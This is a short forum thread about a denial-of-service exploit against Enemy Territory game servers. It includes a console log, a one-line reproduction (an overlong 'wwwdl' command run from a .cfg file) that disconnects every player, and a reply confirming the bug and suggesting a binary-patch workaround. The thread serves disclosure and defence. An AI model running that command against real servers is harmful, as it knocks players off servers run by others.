ET server exploit in the wild

dangerous · **Joined:** 23 Jul 2010 12:20 **Posts:** 1

hello, today a friend of mine who runs a popular ET server in italy experienced an exploit which dropped all players from the server.
he read the console log and saw this:

Code:

SV_WWWDownload: unexpected wwwdl '\nNo vote in progress.\nClientConnect: 0\nWARNING: bad command byte for client 0\nWARNING: bad command byte for client 0\nWARNING: bad command byte for client 0\nWARNING: bad command byte for client 0\nWARNING: bad command byte for client 0\nWARNING: bad command byte for client 0\nWARNING: bad command byte for client 0\nWARNING: bad command byte for client 0\n .. (repeating many times) ..' for client 'ETPlayer'

immediately after this message all players disconnected.
the one responsible for this message (ETPlayer) had a finnish ip, and has been reported to his ISP kponet.fi.

i looked into it and found a way to re-produce the exploit:
simply write this into a .cfg and /exec it while connected to a server:

Code:

cmd wwwdl aaaaaaaaaaaaaaaaaaaaaa... (1020 times a)

apparently it works in all ET versions and mods.

anyone seen that exploit before? how can i protect my friend's server from this?

thanks.

aluigi · **Posted:** 23 Jul 2010 13:02

uhmmm strange, I tested wwwdl weeks ago in CoD4 and nothing bad happened (only the attacker gets disconnected with error message).

while instead I have tested it now on ET using 2 clients and yes, both get disconnected with the "CL_ParseServerMessage: illegible server message 0"

aluigi · **Posted:** 23 Jul 2010 13:04

oh right I forgot the "protection" part :)
obviously would be better to have a real fix but in the meantime you can just overwrite the wwwdl string in the game executable with something else or a series of zeros.
lame but requires no efforts

Luigi Auriemma

ET server exploit in the wild